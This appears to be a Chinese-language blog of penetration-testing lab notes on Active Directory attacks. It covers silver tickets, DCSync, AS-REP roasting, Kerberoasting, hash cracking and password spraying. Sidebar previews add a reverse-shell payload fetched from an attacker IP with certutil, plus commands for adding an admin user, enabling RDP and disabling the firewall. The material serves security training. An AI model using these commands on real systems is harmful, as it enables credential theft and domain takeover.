Active Directory 身分驗證攻擊 (2)

-

 Active Directory 身分驗證攻擊 (2)


Silver Tickets

使用 jeff / HenchmanPutridBonbon11 登入 Client75 後使用 iwr 搭配 -UseDefaultCredentials 

存取 web04,指令 iwr -UseDefaultCredentials http://web04

出現 401 - Unauthorized: Access is denied due to invalid credentials.



創建銀票要三個資訊

1. SPN 密碼 Hash

2. 網域 SID

3. 目標服務的 SPN


使用管理員權限啟動 mimikatz.exe 啟動 debug mode "privilege::debug"

接著輸入 sekurlsa::logonpasswords 來提取快取的 AD 憑證




第一個是服務 iis_service SPN 密碼 Hash 如下圖 4d28cf5252d39971419580a51484ca09




第二個是網域 SID,直接使用 whoami /user 去掉尾碼的 1105 就是我們要的網域 SID

S-1-5-21-1987370270-658905905-1781884369




第三個是 SPN,使用之前手動枚舉學過的 setspn -L iis_service 查找

SPN : HTTP/web04.corp.com



三個資訊都有了

1. SPN 密碼 Hash : 4d28cf5252d39971419580a51484ca09

2. 網域 SID : S-1-5-21-1987370270-658905905-1781884369

3. 目標服務的 SPN : HTTP/web04.corp.com

接著透過 mimikatz 創建使用者 jeffadmin 的銀票

指令 kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin




在 powershell 輸入 klist 查看現有記憶體中的票證,確認是 jeffadmin 對 web04





重新跑一次一開始使用的指令 iwr -UseDefaultCredentials http://web04

可以看到這一次是 HTTP 200 成功讀取了

值得注意的是,我們在沒有存取該用戶的明文密碼或密碼雜湊的情況下執行了此攻擊





練習 : 造訪位於http://web04的網頁。查看頁面的源代碼並找到該 flag

透過依樣的手法,將網頁下載回來存成一個 txt 檔案,再 type 查找 flag 即可

 curl -UseDefaultCredentials -O web04.txt http://web04

type web04.txt








DCSync


以系統管理員開啟 powershell 執行 mimikatz 查詢 dave 的 NTLM hash

指令 lsadump::dcsync /user:corp\dave or lsadump::dcsync /user:dave@corp.com

HASH 值 : 08d7a47a6f9f66b97b1bae4178747494



還記得之前 AD NTLM HASH 的 model 格式為 10000

查詢方式為 └─$ hashcat --help | grep -i "NTLM"




將剛剛的 HASH 存成 dave.hash 然後執行 hashcat 破解吧,指令 └─$ hashcat -m 1000 dave.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

因為之前破解過了是 Flowers1 所以會先檢查 cache 檔若有會直接跳過沒有才會進行破解
這時候可以加上 --show 參數顯示出之前的破解內容


執行 lsadump::dcsync /user:corp\Administrator 改查查看 default 管理者的 NTLM HASH

值 : 2892d26cdf84d7a70e2eb3b9f05c425e




一樣 hashcat 破破看得到密碼是 lab




破過了就到 cache,一樣可以用 --show 來顯示




上述的 dcsync 是透過 windows 上的 mimikatz 來獲得,但我們也可以直接從 kali 的機器上對 DC 直接做 dcsync 的動作,只是要帶上有全縣的帳號才能做,一樣查詢 dave 這個帳號

指令 : └─$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.230.70





練習 1 : 取得krbtgt帳號的 NTLM 雜湊值

執行指令 └─$ impacket-secretsdump -just-dc-user krbtgt corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.230.70





練習 2 : 取得使用者帳戶 maria 的存取權限並登入網域控制器。要執行初始枚舉步驟,您可以使用 pete 和密碼 Nexus123!。您將在 DC1 上的網域管理員的桌面上找到該標誌。如果您獲得要破解的雜湊值,請建立並使用一個不添加任何內容、「1」或「!」的規則檔案。rockyou.txt的密碼


用已知的 AD 帳號密碼 烘培一下看看有沒有帳號是 "不需要啟用 Kerberos 預先驗證"

└─$ impacket-GetNPUsers -dc-ip 192.168.230.70  -request -outputfile hashes.asreproast corp.com/pete

有兩個帳號 mike 與 dave,這是 AS-REP 格式,所以 hashcat 用 18200




建立一個 rule 稱為 2.rule,內容用 $1,3.rule 內容用 $!,執行 hashcat 破解看看

└─$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r ./2.rule --force 

└─$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r ./3.rule --force 

破解出來一個,帳號密碼 mike / Darkness1099!




執行 crackmapexec 密碼噴灑看看該帳號密碼對哪一台有管理者權限

└─$ crackmapexec smb 192.168.230.75 -u mike -p 'Darkness1099!' -d corp.com

看來對 Client75 有管理者權限



RDP 登入 Client75 先看一下 Domain admins 群組

Get-DomainGroupMember -Identity "domain admins"

發現有三個帳號 Administrator / jeffadmin / maria




在 Client75 開啟 mimikatz 執行 privilege::debug & sekurlsa::logonpasswords





結果發現 maria 的快取 HASH : 2a944a58d4ffa77137b2c587e6ed7626




hashcat 破破看 └─$ hashcat -m 1000 2a944a58d4ffa77137b2c587e6ed7626 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

得到密碼是 passwordt_1415




RDP 進 DC,└─$ xfreerdp /u:maria /p:'passwordt_1415' /d:corp.com /v:192.168.230.70

桌面拿 flag





練習 3 : 透過檢查洩漏的密碼資料庫站點,您發現密碼 VimForPowerShell123! 以前被網域使用者使用過。將此密碼噴灑到網域使用者 meg 和 backupuser。一旦您確定了一組有效的憑證,請使用本模組中的技術來取得對網域控制器的存取權限。您將在 DC1 上的網域管理員的桌面上找到該標誌


直接使用 crackmapexec 測試帳號密碼看哪一台有管理員權限

crackmapexec smb 192.168.210.75 -u meg  -p 'VimForPowerShell123!' -d corp.com

帳號 meg 測試了一輪沒有管理者權限



改測試帳號 backupuser,驗證失敗,所以看來該密碼不適用 backupuser

crackmapexec smb 192.168.210.75 -u backupuser -p 'VimForPowerShell123!' -d corp.com




改烘培一下看看有沒有帳號是 "不需要啟用 Kerberos 預先驗證"

└─$ impacket-GetNPUsers -dc-ip 192.168.210.70  -request -outputfile hashes.asreproast corp.com/meg

找到 dave






hashcat 下去開始破解,└─$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

得到帳號密碼 : dave / Flowers1





改用 dave 帳號密碼看看有沒有對哪一台有管理者權限

crackmapexec smb 192.168.210.75 -u dave -p 'Flowers1' -d corp.com

Client75 / Client74 都有權限





RDP 進 Client74 執行 Get-DomainGroupMember "Domain admins" 發現網域管理者成員有三個

Administrator、jeffadmin、backupuser





執行 .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

rubeus.exe 可以從這裡下載 https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

得到 backupuser 的 HASH 檔,這是 TSG-REQ 格式,mode 13100




hashcat 破破看吧,└─$ sudo hashcat -m 13100 backupuser.hash /usr/share/wordlists/rockyou.txt -r ./2.rule --force

破出來了是 DonovanJadeKnight1



RDP 進 DC 拿取 flag,└─$ xfreerdp /u:backupuser /p:'DonovanJadeKnight1' /d:corp.com /v:192.168.210.70






留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容